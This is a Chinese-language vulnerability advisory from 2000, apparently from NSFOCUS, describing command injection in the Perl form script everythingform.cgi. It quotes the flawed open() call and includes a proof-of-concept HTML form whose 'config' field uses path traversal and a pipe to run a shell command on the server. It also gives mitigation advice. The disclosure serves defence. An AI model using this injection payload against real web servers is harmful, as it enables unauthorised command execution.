everythingform.cgi可执行任意命令
发布日期:2000-12-14
更新日期:2000-12-14
受影响系统:
Leif M. Wright everythingform.cgi 2.0for unix
描述:
Leif M. Wright(
http://www.conservatives.net/atheist/scripts/index.html?Download&everythingform)编写的everythingform.cgi是一个基于Perl的表单设计
工具,它对输入进行合法性检查时存在一个漏洞。
该脚本无法从用户提供的“config”域中正确滤除shell命令。如下:
..
$ConfigFile = $in{config};
..
open(CONFIG, "$configdir$ConfigFile") || &Error("I can\'t open $ConfigFile in
the ReadConfig subroutine. Reason: $!");
结果,该脚本可以以web服务器的权限执行任意命令。
<*来源:rpc (
h@ckz.org) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
下面的例子将执行ping程序:
<form action="http://www.conservatives.net/someplace/everythingform.cgi" method=POST>
<h1>everythingform.cgi exploit</h1>
Command: <input type=text name=config value="../../../../../../../../bin/ping -c 5 http://www.foobar.com|>
<input type=hidden name=Name value="expletive deleted">
<input type=hidden name="e-mail" value="foo@bar.net">
<input type=hidden name=FavoriteColor value=Black>
<input type=submit value=run>
</form>
建议:
临时解决办法:
NSFOCUS建议您自行修改该CGI脚本,增加对shell命令和元字符的过滤。
厂商补丁:
暂无。
浏览次数:5723
严重程度:0(网友投票)